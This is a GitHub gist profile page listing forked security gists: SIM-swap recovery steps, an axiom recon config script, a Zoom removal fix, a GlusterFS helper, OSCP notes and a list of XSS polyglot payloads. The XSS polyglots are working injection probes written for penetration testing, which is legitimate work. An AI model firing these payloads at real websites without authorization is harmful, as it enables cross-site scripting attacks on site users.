Skip to content

Instantly share code, notes, and snippets.

wellr00t3d /
Created February 13, 2023 19:00 — forked from karllhughes/
What to do if you get Sim-Swapped

Here's how this attack works:

Immediate actions

  • Make sure your primary email address has a secure recovery method and remove your old phone number from it.
    • Gmail lets you set "Backup codes" that you can print off to recover your account.
    • Change your email password and put it in a password manager.
    • Remove any link to the old phone number from your email.
  • If you're already locked out of your email, set up a "clean" email account. At this point, your old one is being accessed by hackers and can be used to reset any banking passwords.
  • Store this new email password in a password manager.
wellr00t3d /
Created December 7, 2022 09:47 — forked from six2dez/
# Use this as initial axiom's script on reconftw.cfg file to copy config files to the fleet
axiom-exec 'mkdir -p /home/op/.config/amass/ /home/op/Tools/ /home/op/.config/subfinder/ /home/op/.config/notify/'
axiom-scp ~/.config/amass/config.ini '*':/home/op/.config/amass/config.ini
axiom-scp ~/Tools/h8mail_config.ini '*':/home/op/Tools/h8mail_config.ini
axiom-scp ~/Tools/.github_tokens '*':/home/op/Tools/.github_tokens
axiom-scp ~/.config/notify/notify.conf '*':/home/op/.config/notify/notify.conf
axiom-scp ~/Tools/.github_tokens '*':/home/op/Tools/.github_tokens
wellr00t3d / xss-polyglots.txt
Last active April 10, 2023 11:48 — forked from michenriksen/xss-polyglots.txt
XSS Polyglot payloads
View xss-polyglots.txt
javascript:"/*'/*`/*--></noscript></title></textarea></style></template></noembed></script><html \" onmouseover=/*<svg/*/onload=alert()//>
javascript:"/*'/*`/*\" /*</title></style></textarea></noscript></noembed></template></script/--><svg/onload=/*<html/*/onmouseover=alert()//>
javascript:"/*\"/*`/*' /*</template></textarea></noembed></noscript></title></style></script>--><svg onload=/*<html/*/onmouseover=alert()//>
javascript:`//"//\"//</title></textarea></style></noscript></noembed></script></template><svg/onload='/*--><html */ onmouseover=alert()//'>`
javascript:`/*\"/*--><svg onload='/*</template></noembed></noscript></style></title></textarea></script><html onmouseover="/**/ alert()//'">`
javascript:"/*'//`//\"//</template/</title/</textarea/</style/</noscript/</noembed/</script/--><script>/<i<frame */ onload=alert()//</script>
wellr00t3d / all.txt
Created October 5, 2019 05:14 — forked from jhaddix/all.txt
all wordlists from every dns enumeration tool... ever. Please excuse the lewd entries =/
View all.txt
This file has been truncated, but you can view the full file.
wellr00t3d /
Created October 2, 2019 03:14 — forked from PatrikHudak/
Second-order subdomain takeover
# coding=utf-8
# python3
from urllib.parse import urlparse
import requests
import urllib3
from bs4 import BeautifulSoup
wellr00t3d /
Created July 10, 2019 16:02 — forked from karanlyons/ZoomDaemon.yara
Fix for Unexpected Zoom Behavior

If you're using macOS, run these commands:

pkill "ZoomOpener"; rm -rf ~/.zoomus; touch ~/.zoomus && chmod 000 ~/.zoomus;
pkill "RingCentralOpener"; rm -rf ~/.ringcentralopener; touch ~/.ringcentralopener && chmod 000 ~/.ringcentralopener;

These two commands do the same thing for the two most popular "brands" of Zoom (Zoom, and RingCentral). They first kill the hidden server if it is running, and then regardless deletes it from its hidden directory if it exists there. Finally they create an empty file

wellr00t3d /
Created October 2, 2018 09:50 — forked from louiszuckerman/
Glusterfs GFID Resolver Turns a GFID into a real path in the brick
if [[ "$#" < "2" || "$#" > "3" ]]; then
cat <<END
Glusterfs GFID resolver -- turns a GFID into a real file path
Usage: $0 <brick-path> <gfid> [-q]
<brick-path> : the path to your glusterfs brick (required)

How to pass the OSCP

  1. Recon
  2. Find vuln
  3. Exploit
  4. Document it


Unicornscans in cli, nmap in msfconsole to help store loot in database.